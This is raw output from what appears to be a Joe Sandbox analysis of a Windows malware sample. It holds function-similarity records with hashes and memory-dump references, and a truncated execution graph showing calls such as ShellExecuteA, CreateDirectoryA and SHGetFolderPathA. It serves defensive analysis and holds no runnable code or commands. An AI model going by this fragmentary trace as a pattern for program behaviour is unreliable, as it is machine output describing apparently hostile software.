                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: __getptd$__amsg_exit__getptd_noexit
                                                          • String ID: csm
                                                          • API String ID: 803148776-1018135373
                                                          • Opcode ID: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
                                                          • Instruction ID: 150cc589347cf2e04de715a0c7379fb62f55a79be2bbe3a04d27ff5acdbbfdc5
                                                          • Opcode Fuzzy Hash: 86966626eb4e0d809bdbd7093bece3461dc5396f3a0cf366651c66bb381db945
                                                          • Instruction Fuzzy Hash: 890181358053088FDB24BF63D440A9EBBF9BF08359F65596ED061FAE50DB308584CB41
                                                          Function 6CFC3EA4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 26COMMONLIBRARYCODE
                                                          Download Yara Rule
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: NameName::
                                                          • String ID: {flat}
                                                          • API String ID: 1333004437-2606204563
                                                          • Opcode ID: fed32583c7fca8a0d7f176c44e9008a453444325a88d23f1a09781c64702dfec
                                                          • Instruction ID: 628c70d648c5a0c4d81eeab000e22a9527b238ff2e01a66755dec4c198abd302
                                                          • Opcode Fuzzy Hash: fed32583c7fca8a0d7f176c44e9008a453444325a88d23f1a09781c64702dfec
                                                          • Instruction Fuzzy Hash: D8F0A0713442459FCB10DF58D054BE93BB4DB82B99F04C041E91C0F742C772D84AC752
                                                          Function 03396DF8 Relevance: 5.2, Strings: 4, Instructions: 153COMMON
                                                          Download Yara Rule
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1650111319.0000000003390000.00000040.00000800.00020000.00000000.sdmp, Offset: 03390000, based on PE: false
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_3390000_file.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 4'^q$4'^q$4'^q$$^q
                                                          • API String ID: 0-296639492
                                                          • Opcode ID: 717779d9096c02c093a432185390a79d64b63b4b1edbe958476e7211fe1c7586
                                                          • Instruction ID: b8e417dafc9598e30d0beeb07f025daf2a2d42cc30c100ef32e87827c476bc0c
                                                          • Opcode Fuzzy Hash: 717779d9096c02c093a432185390a79d64b63b4b1edbe958476e7211fe1c7586
                                                          • Instruction Fuzzy Hash: 21418030B45214CFDB19EB39CAD953E77EAABC8A6071944AAE006CB375DE25CC428741
                                                          Function 6CF67673 Relevance: 5.1, APIs: 4, Instructions: 83COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?,CA0C7769), ref: 6CF676AD
                                                          • LeaveCriticalSection.KERNEL32(?,?,?,CA0C7769), ref: 6CF676FF
                                                          • EnterCriticalSection.KERNEL32(CA0C7769,?,?,?,CA0C7769), ref: 6CF6770D
                                                          • LeaveCriticalSection.KERNEL32(CA0C7769,?,00000000,?,?,?,?,CA0C7769), ref: 6CF6772A
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                            • Part of subcall function 6CF66D40: _rand.LIBCMT ref: 6CF66DEA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$_malloc_rand
                                                          • String ID:
                                                          • API String ID: 119520971-0
                                                          • Opcode ID: 8b5425522c4cdeec86e4870f10a9247d2e4aa80fef9fea1abe2c7f67b879d33e
                                                          • Instruction ID: 44b41e5d0260677e7e40219c383a37ddcf3f0b0ba71b526f7ccf52f2cb089887
                                                          • Opcode Fuzzy Hash: 8b5425522c4cdeec86e4870f10a9247d2e4aa80fef9fea1abe2c7f67b879d33e
                                                          • Instruction Fuzzy Hash: 21216571904609AFCB10DF65CC44EDBB7BDFF41354F10862AE92697A40EB71BA05CBA0
                                                          Function 6CF67680 Relevance: 5.1, APIs: 4, Instructions: 71COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?,CA0C7769), ref: 6CF676AD
                                                          • LeaveCriticalSection.KERNEL32(?,?,?,CA0C7769), ref: 6CF676FF
                                                          • EnterCriticalSection.KERNEL32(CA0C7769,?,?,?,CA0C7769), ref: 6CF6770D
                                                          • LeaveCriticalSection.KERNEL32(CA0C7769,?,00000000,?,?,?,?,CA0C7769), ref: 6CF6772A
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                            • Part of subcall function 6CF66D40: _rand.LIBCMT ref: 6CF66DEA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave$_malloc_rand
                                                          • String ID:
                                                          • API String ID: 119520971-0
                                                          • Opcode ID: 79b4a4a14e409cc42e1341d3935b90f33869202548d65788087236b83186e1cc
                                                          • Instruction ID: c822b73b4a09ebc4da714d3c27e2b709bc6b4fef2fbfa44405651d454bc6b260
                                                          • Opcode Fuzzy Hash: 79b4a4a14e409cc42e1341d3935b90f33869202548d65788087236b83186e1cc
                                                          • Instruction Fuzzy Hash: 38218771904609AFCB10DF65CC44EDBB7BDFF41354F10862AE81697A40EB71BA05CBA0
                                                          Function 6CF69580 Relevance: 5.1, APIs: 4, Instructions: 68COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?,?,?), ref: 6CF695A9
                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?), ref: 6CF695CA
                                                          • EnterCriticalSection.KERNEL32(00000000,?,?), ref: 6CF695DA
                                                          • LeaveCriticalSection.KERNEL32(00000000,?,?,?), ref: 6CF695FB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: CriticalSection$EnterLeave
                                                          • String ID:
                                                          • API String ID: 3168844106-0
                                                          • Opcode ID: fee158bf92c3801f0761110f21ee5bbfb6a7eb34a27a8801db153cdc4fc6faf4
                                                          • Instruction ID: 2e9146a9cdc30fd7a74e9c260bb2692a96eeb0270a2ccdda381a4b2ccabeb35a
                                                          • Opcode Fuzzy Hash: fee158bf92c3801f0761110f21ee5bbfb6a7eb34a27a8801db153cdc4fc6faf4
                                                          • Instruction Fuzzy Hash: 0F117C32A05108EFCB00CFAAE884DDEFBB8FF51318B10419AE51597A10DB30FA55CBA0

                                                          Execution Graph

                                                          Execution Coverage:18.2%
                                                          Dynamic/Decrypted Code Coverage:0%
                                                          Signature Coverage:10.5%
                                                          Total number of Nodes:2000
                                                          Total number of Limit Nodes:103
                                                          execution_graph 84885 48bac8 85325 41ac50 84885->85325 84887 48bb99 84888 41ac50 35 API calls 84887->84888 84889 48bc7b 84888->84889 84890 41ac50 35 API calls 84889->84890 84892 48bd5d 84890->84892 84891 48e420 84894 48e42b ShellExecuteA 84891->84894 84895 48c6c0 84892->84895 85333 402cf0 84892->85333 84899 4163b0 std::_Throw_Cpp_error 35 API calls 84894->84899 84897 402cf0 std::_Throw_Cpp_error 35 API calls 84895->84897 84898 48dae3 84895->84898 84900 48c7b2 84897->84900 84898->84891 84901 402cf0 std::_Throw_Cpp_error 35 API calls 84898->84901 84903 48e51f 84899->84903 84905 416210 35 API calls 84900->84905 84906 48dbd5 84901->84906 84907 4163b0 std::_Throw_Cpp_error 35 API calls 84903->84907 84908 48c88d 84905->84908 84909 416210 35 API calls 84906->84909 84913 41ab20 35 API calls 84908->84913 84914 48dcb0 84909->84914 84916 48c96a 84913->84916 84917 41ab20 35 API calls 84914->84917 85326 41ac81 85325->85326 85326->85326 85327 41ac9b 85326->85327 85329 41acd3 85326->85329 85516 41e8a0 85327->85516 85520 41fbf0 85329->85520 85330 41acb2 85330->84887 85332 41ad24 85332->84887 85334 402d13 85333->85334 85334->85334 85565 403040 85334->85565 85336 402d25 85337 416210 85336->85337 85517 41e8ce 85516->85517 85519 41e8f8 __Strxfrm 85516->85519 85529 4032d0 85517->85529 85519->85330 85521 41fc8d 85520->85521 85525 41fc12 __Strxfrm 85520->85525 85522 41fd5e 85521->85522 85523 4032d0 std::_Throw_Cpp_error 35 API calls 85521->85523 85524 41fce1 __Strxfrm 85523->85524 85526 41fd3a __Strxfrm 85524->85526 85564 402fe0 33 API calls 2 library calls 85524->85564 85525->85332 85526->85332 85528 41fd27 85528->85332 85530 4032e2 85529->85530 85531 403306 85529->85531 85532 4032e9 85530->85532 85533 40331f 85530->85533 85534 403318 85531->85534 85536 433672 std::_Facet_Register 35 API calls 85531->85536 85543 433672 85532->85543 85554 402b50 35 API calls 2 library calls 85533->85554 85534->85519 85539 403310 85536->85539 85538 4032ef 85540 438c70 std::_Throw_Cpp_error 33 API calls 85538->85540 85541 4032f8 85538->85541 85539->85519 85542 403329 85540->85542 85541->85519 85546 433677 85543->85546 85545 433691 85545->85538 85546->85545 85549 402b50 Concurrency::cancel_current_task 85546->85549 85555 4423ec 85546->85555 85562 445a89 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 85546->85562 85548 43369d 85548->85548 85549->85548 85560 4351fb RaiseException 85549->85560 85551 402b6c 85561 434b15 34 API calls 2 library calls 85551->85561 85553 402bac 85553->85538 85554->85538 85558 44b094 _strftime 85555->85558 85556 44b0bd RtlAllocateHeap 85557 44b0d0 __dosmaperr 85556->85557 85556->85558 85557->85546 85558->85556 85558->85557 85563 445a89 EnterCriticalSection LeaveCriticalSection std::_Facet_Register 85558->85563 85560->85551 85561->85553 85562->85546 85563->85558 85564->85528 85566 4030c8 85565->85566 85568 403052 85565->85568 85567 403057 __Strxfrm 85567->85336 85568->85567 85569 4032d0 std::_Throw_Cpp_error 35 API calls 85568->85569 85570 4030a3 __Strxfrm 85569->85570 85570->85336 85888 45e140 85942 40b8e0 85888->85942 85890 45e1a1 85891 41ab20 35 API calls 85890->85891 85892 45e218 CreateDirectoryA 85891->85892 85898 45e8de 85892->85898 85935 45e24c 85892->85935 85893 45f16d 85894 402df0 std::_Throw_Cpp_error 35 API calls 85893->85894 85897 45f17c 85894->85897 85895 45e8a5 85896 4163b0 std::_Throw_Cpp_error 35 API calls 85895->85896 85900 45e8b9 85896->85900 85898->85893 85899 41ab20 35 API calls 85898->85899 85901 45e962 CreateDirectoryA 85899->85901 86531 4df030 85900->86531 85903 45f15b 85901->85903 85937 45e990 85901->85937 85905 402df0 std::_Throw_Cpp_error 35 API calls 85903->85905 85905->85893 85906 45f11f 85908 4163b0 std::_Throw_Cpp_error 35 API calls 85906->85908 85909 45f136 85908->85909 86666 4d7600 85909->86666 85912 4163b0 35 API calls std::_Throw_Cpp_error 85912->85937 85914 4e6ca0 46 API calls 85914->85935 85915 41ad80 35 API calls 85915->85937 85916 45e3bf CreateDirectoryA 85916->85935 85917 41ab20 35 API calls 85917->85935 85918 45eb09 CreateDirectoryA 85918->85937 85919 402df0 35 API calls std::_Throw_Cpp_error 85919->85935 85920 402df0 35 API calls std::_Throw_Cpp_error 85920->85937 85922 45e4b2 CreateDirectoryA 85922->85935 85923 45ebfc CreateDirectoryA 85923->85937 85924 41ad80 35 API calls 85924->85935 85925 402cf0 std::_Throw_Cpp_error 35 API calls 85925->85935 85926 41ab20 35 API calls 85926->85937 85928 45e59f CreateDirectoryA 85928->85935 85930 402cf0 std::_Throw_Cpp_error 35 API calls 85930->85937 85931 4162c0 35 API calls 85931->85935 85932 45edd0 CreateDirectoryA 85932->85937 85933 45ece9 CreateDirectoryA 85933->85937 85934 416290 35 API calls 85934->85937 85935->85895 85935->85914 85935->85916 85935->85917 85935->85919 85935->85922 85935->85924 85935->85925 85935->85928 85935->85931 85938 45e7f4 CreateDirectoryA 85935->85938 85940 4163b0 35 API calls std::_Throw_Cpp_error 85935->85940 87485 416290 85935->87485 87489 41ae20 85935->87489 85936 41ae20 35 API calls 85936->85937 85937->85906 85937->85912 85937->85915 85937->85918 85937->85920 85937->85923 85937->85926 85937->85930 85937->85932 85937->85933 85937->85934 85937->85936 85939 4e6ca0 46 API calls 85937->85939 85941 45f050 CreateDirectoryA 85937->85941 87492 4162c0 85937->87492 85938->85935 85939->85937 85940->85935 85941->85937 85943 40b916 __wsopen_s 85942->85943 85944 40c004 85943->85944 85947 41ab20 35 API calls 85943->85947 85945 40f393 85944->85945 85946 40c00e 85944->85946 85948 411da6 85945->85948 85952 41ab20 35 API calls 85945->85952 85949 41ab20 35 API calls 85946->85949 85950 40b9e7 CreateDirectoryA 85947->85950 85953 411db0 85948->85953 85954 412294 85948->85954 85951 40c0ab CreateDirectoryA 85949->85951 85955 40bff2 85950->85955 85956 40ba12 85950->85956 85958 40f381 85951->85958 85959 40c0d6 85951->85959 85957 40f43a CreateDirectoryA 85952->85957 85960 41ab20 35 API calls 85953->85960 85954->85890 85961 402df0 std::_Throw_Cpp_error 35 API calls 85955->85961 85962 41ab20 35 API calls 85956->85962 85966 411d94 85957->85966 85967 40f465 85957->85967 85963 402df0 std::_Throw_Cpp_error 35 API calls 85958->85963 85965 41ab20 35 API calls 85959->85965 85968 411e4d CreateDirectoryA 85960->85968 85961->85944 85964 40bab4 CreateDirectoryA 85962->85964 85963->85945 85969 40bae2 __fread_nolock 85964->85969 85970 40bc4c 85964->85970 85972 40c178 CreateDirectoryA 85965->85972 85973 402df0 std::_Throw_Cpp_error 35 API calls 85966->85973 85971 41ab20 35 API calls 85967->85971 85974 412282 85968->85974 85975 411e78 85968->85975 85982 40baf5 SHGetFolderPathA 85969->85982 85979 41ab20 35 API calls 85970->85979 85978 40f507 CreateDirectoryA 85971->85978 85976 40c1a0 85972->85976 85977 40c4b9 85972->85977 85973->85948 85981 402df0 std::_Throw_Cpp_error 35 API calls 85974->85981 85980 41ab20 35 API calls 85975->85980 85986 402cf0 std::_Throw_Cpp_error 35 API calls 85976->85986 85983 41ab20 35 API calls 85977->85983 85984 40f877 85978->85984 85985 40f52f 85978->85985 85987 40bcea CreateDirectoryA 85979->85987 85988 411fa0 CreateDirectoryA 85980->85988 85981->85954 85990 402cf0 std::_Throw_Cpp_error 35 API calls 85982->85990 85989 40c557 CreateDirectoryA 85983->85989 85991 41ab20 35 API calls 85984->85991 86009 403040 std::_Throw_Cpp_error 35 API calls 85985->86009 85992 40c2be 85986->85992 85993 40bd12 __fread_nolock 85987->85993 85994 40bfbf 85987->85994 85995 411fc8 85988->85995 86218 41225e 85988->86218 85997 40d1de 85989->85997 85998 40c57f 85989->85998 85996 40bba1 85990->85996 85999 40f915 CreateDirectoryA 85991->85999 86019 41ace0 35 API calls 85992->86019 86011 40bd25 SHGetFolderPathA 85993->86011 86000 40bfd1 85994->86000 86006 4e6770 53 API calls 85994->86006 86012 403040 std::_Throw_Cpp_error 35 API calls 85995->86012 86003 41ace0 35 API calls 85996->86003 86010 41ab20 35 API calls 85997->86010 86002 402cf0 std::_Throw_Cpp_error 35 API calls 85998->86002 86004 40fb99 85999->86004 86005 40f93d 85999->86005 86007 402df0 std::_Throw_Cpp_error 35 API calls 86000->86007 86001 4e6770 53 API calls 86008 412270 86001->86008 86015 40c727 86002->86015 86014 40bbb7 86003->86014 86013 41ab20 35 API calls 86004->86013 86016 402cf0 std::_Throw_Cpp_error 35 API calls 86005->86016 86006->86000 86018 40bfe3 86007->86018 86031 402df0 std::_Throw_Cpp_error 35 API calls 86008->86031 86017 40f704 86009->86017 86020 40d27c CreateDirectoryA 86010->86020 86021 402cf0 std::_Throw_Cpp_error 35 API calls 86011->86021 86025 41211c 86012->86025 86026 40fc37 CreateDirectoryA 86013->86026 86027 402df0 std::_Throw_Cpp_error 35 API calls 86014->86027 86041 41ace0 35 API calls 86015->86041 86028 40fa5b 86016->86028 86038 41ace0 35 API calls 86017->86038 86029 402df0 std::_Throw_Cpp_error 35 API calls 86018->86029 86030 40c367 86019->86030 86022 40d2a4 86020->86022 86023 40d63c 86020->86023 86024 40be57 86021->86024 86048 402cf0 std::_Throw_Cpp_error 35 API calls 86022->86048 86036 41ab20 35 API calls 86023->86036 86032 41ace0 35 API calls 86024->86032 86050 41ace0 35 API calls 86025->86050 86033 40fe35 86026->86033 86034 40fc5f 86026->86034 86035 40bbc9 86027->86035 86055 41ace0 35 API calls 86028->86055 86029->85955 86037 402df0 std::_Throw_Cpp_error 35 API calls 86030->86037 86031->85974 86039 40be6d 86032->86039 86043 41ab20 35 API calls 86033->86043 86040 402cf0 std::_Throw_Cpp_error 35 API calls 86034->86040 86042 4e6ca0 46 API calls 86035->86042 86045 40d6da CreateDirectoryA 86036->86045 86044 40c379 86037->86044 86046 40f7b1 86038->86046 86049 402df0 std::_Throw_Cpp_error 35 API calls 86039->86049 86051 40fcf7 86040->86051 86053 40c7d0 86041->86053 86052 40bbe2 86042->86052 86054 40fed3 CreateDirectoryA 86043->86054 86047 402cf0 std::_Throw_Cpp_error 35 API calls 86044->86047 86056 40d702 86045->86056 86057 40da1b 86045->86057 86060 40f7d6 86046->86060 87540 402fe0 33 API calls 2 library calls 86046->87540 86058 40c39b 86047->86058 86061 40d3bb 86048->86061 86062 40be7f 86049->86062 86063 4121c9 86050->86063 86087 41ace0 35 API calls 86051->86087 86079 4163b0 std::_Throw_Cpp_error 35 API calls 86052->86079 86107 40bc12 86052->86107 86064 402df0 std::_Throw_Cpp_error 35 API calls 86053->86064 86066 410e56 86054->86066 86067 40fefb 86054->86067 86068 40fb04 86055->86068 86070 4e6d70 60 API calls 86058->86070 86077 4e6ca0 46 API calls 86060->86077 86096 41ace0 35 API calls 86061->86096 86076 402cf0 std::_Throw_Cpp_error 35 API calls 86062->86076 86073 402df0 std::_Throw_Cpp_error 35 API calls 86063->86073 86080 40c7e2 86064->86080 86074 402df0 std::_Throw_Cpp_error 35 API calls 86068->86074 86071 4e6770 53 API calls 86084 40bc28 86071->86084 86086 4121db 86073->86086 86088 40fb16 86074->86088 86089 40f80d 86077->86089 86094 40bbfa 86079->86094 86098 4e6ca0 46 API calls 86086->86098 86117 4163b0 std::_Throw_Cpp_error 35 API calls 86089->86117 86202 40f83d 86089->86202 86106 4e6770 53 API calls 86219 40f853 86106->86219 86107->86071 86107->86084 86134 40f825 86117->86134 86202->86106 86202->86219 86218->86001 86218->86008 87659 4359b0 86531->87659 86534 4df150 86534->86534 86535 403040 std::_Throw_Cpp_error 35 API calls 86534->86535 86536 4df16c 86535->86536 86667 4d7636 __fread_nolock __wsopen_s 86666->86667 86668 4d7654 SHGetFolderPathA 86667->86668 87486 4162b1 87485->87486 87487 41629d 87485->87487 87486->85935 87767 416130 87487->87767 87776 41e710 87489->87776 87491 41ae54 87491->85935 87493 4162d3 87492->87493 87494 4162ce 87492->87494 87493->85937 87495 402df0 std::_Throw_Cpp_error 35 API calls 87494->87495 87495->87493 87540->86060 87660 4359c7 SHGetFolderPathA 87659->87660 87660->86534 87768 416174 87767->87768 87769 416143 __Strxfrm 87767->87769 87770 416200 87768->87770 87771 4032d0 std::_Throw_Cpp_error 35 API calls 87768->87771 87769->87486 87773 4161bf __Strxfrm 87771->87773 87772 4161ed 87772->87486 87773->87772 87775 402fe0 33 API calls 2 library calls 87773->87775 87775->87772 87777 41e753 87776->87777 87778 4032d0 std::_Throw_Cpp_error 35 API calls 87777->87778 87779 41e758 __Strxfrm 87777->87779 87780 41e843 __Strxfrm 87778->87780 87779->87491 87780->87491 87781 45f740 87782 4602fc 87781->87782 87783 45f794 87781->87783 87785 41ab20 35 API calls 87782->87785 87784 41ab20 35 API calls 87783->87784 87786 45f876 87784->87786 87787 4603de 87785->87787 87788 4e6ca0 46 API calls 87786->87788 87789 4e6ca0 46 API calls 87787->87789 87790 45f89c 87788->87790 87791 460404 87789->87791 87798 45f8bf 87790->87798 87928 4e6c10 87790->87928 87793 4e6c10 45 API calls 87791->87793 87795 460427 87791->87795 87793->87795 87794 461b00 87799 461b1b 87794->87799 87804 4e6770 53 API calls 87794->87804 87795->87794 87795->87799 87800 41b260 35 API calls 87795->87800 87796 4602ea 87802 402df0 std::_Throw_Cpp_error 35 API calls 87796->87802 87797 4602cf 87797->87796 87805 4e6770 53 API calls 87797->87805 87798->87796 87798->87797 87940 41b260 87798->87940 87803 402df0 std::_Throw_Cpp_error 35 API calls 87799->87803 87812 460457 std::ios_base::_Ios_base_dtor 87800->87812 87802->87782 87806 461b2d 87803->87806 87804->87799 87805->87796 87808 461af1 87810 408ab0 35 API calls 87808->87810 87810->87794 87811 4130f0 35 API calls 87811->87812 87812->87808 87812->87811 87814 41b260 35 API calls 87812->87814 87817 408ab0 35 API calls 87812->87817 87819 4163b0 35 API calls std::_Throw_Cpp_error 87812->87819 87821 416210 35 API calls 87812->87821 87825 4e6ca0 46 API calls 87812->87825 87827 439820 35 API calls 87812->87827 87828 41ac50 35 API calls 87812->87828 87830 4e6c10 45 API calls 87812->87830 87831 41ae20 35 API calls 87812->87831 87835 41abb0 35 API calls 87812->87835 87836 416240 35 API calls 87812->87836 87838 413200 35 API calls 87812->87838 87839 43d0a8 58 API calls 87812->87839 87842 402cf0 35 API calls std::_Throw_Cpp_error 87812->87842 87848 41b400 35 API calls 87812->87848 87849 41af80 35 API calls 87812->87849 87851 403040 std::_Throw_Cpp_error 35 API calls 87812->87851 87852 41ace0 35 API calls 87812->87852 87853 4162c0 35 API calls 87812->87853 87854 461e04 87812->87854 87862 403350 59 API calls 87812->87862 87865 416260 35 API calls 87812->87865 87868 402df0 35 API calls std::_Throw_Cpp_error 87812->87868 87959 4219a0 87812->87959 87814->87812 87817->87812 87819->87812 87821->87812 87825->87812 87827->87812 87828->87812 87830->87812 87831->87812 87835->87812 87836->87812 87838->87812 87839->87812 87842->87812 87848->87812 87849->87812 87851->87812 87852->87812 87853->87812 87855 438c70 std::_Throw_Cpp_error 33 API calls 87854->87855 87856 461e09 87855->87856 87857 41ab20 35 API calls 87856->87857 87858 461f34 87857->87858 87859 4e6ca0 46 API calls 87858->87859 87860 461f5a 87859->87860 87861 4e6c10 45 API calls 87860->87861 87864 461f7d 87860->87864 87861->87864 87862->87812 87863 46299f 87867 4e6770 53 API calls 87863->87867 87869 4629be 87863->87869 87864->87863 87866 41b260 35 API calls 87864->87866 87864->87869 87865->87812 87923 461fad 87866->87923 87867->87869 87868->87812 87871 41ab20 35 API calls 87869->87871 87870 462990 87872 462aa3 87871->87872 87888 413200 35 API calls 87888->87923 87889 41b260 35 API calls 87889->87923 87890 408ab0 35 API calls 87890->87923 87891 4163b0 35 API calls std::_Throw_Cpp_error 87891->87923 87895 41ac50 35 API calls 87895->87923 87896 416210 35 API calls 87896->87923 87898 4e6ca0 46 API calls 87898->87923 87900 439820 35 API calls 87900->87923 87902 4e6c10 45 API calls 87902->87923 87903 41ae20 35 API calls 87903->87923 87904 41abb0 35 API calls 87904->87923 87907 4130f0 35 API calls 87907->87923 87909 416240 35 API calls 87909->87923 87910 43d0a8 58 API calls 87910->87923 87913 402df0 35 API calls std::_Throw_Cpp_error 87913->87923 87914 402cf0 35 API calls std::_Throw_Cpp_error 87914->87923 87919 41af80 35 API calls 87919->87923 87921 403350 59 API calls 87921->87923 87922 41b400 35 API calls 87922->87923 87923->87870 87923->87888 87923->87889 87923->87890 87923->87891 87923->87895 87923->87896 87923->87898 87923->87900 87923->87902 87923->87903 87923->87904 87923->87907 87923->87909 87923->87910 87923->87913 87923->87914 87923->87919 87923->87921 87923->87922 87929 432b99 7 API calls 87928->87929 87930 4e6c3d 87929->87930 87931 4e6c44 87930->87931 87932 4e6c82 87930->87932 87933 4e6c89 87931->87933 87934 4e6c50 CreateDirectoryA 87931->87934 87935 432534 std::_Throw_Cpp_error 36 API calls 87932->87935 87937 432534 std::_Throw_Cpp_error 36 API calls 87933->87937 87936 432baa ReleaseSRWLockExclusive 87934->87936 87935->87933 87938 4e6c6e 87936->87938 87939 4e6c9a 87937->87939 87938->87798 87941 433672 std::_Facet_Register 35 API calls 87940->87941 87942 41b2b8 87941->87942 87943 41b2e2 87942->87943 87944 41b3b4 87942->87944 87945 433672 std::_Facet_Register 35 API calls 87943->87945 87947 402cf0 std::_Throw_Cpp_error 35 API calls 87944->87947 87946 41b2f7 87945->87946 87973 42e7e0 87946->87973 87948 41b3c4 87947->87948 87949 41ace0 35 API calls 87948->87949 87951 41b3d9 87949->87951 87987 4351fb RaiseException 87951->87987 87952 41b33b 87953 41b352 87952->87953 87954 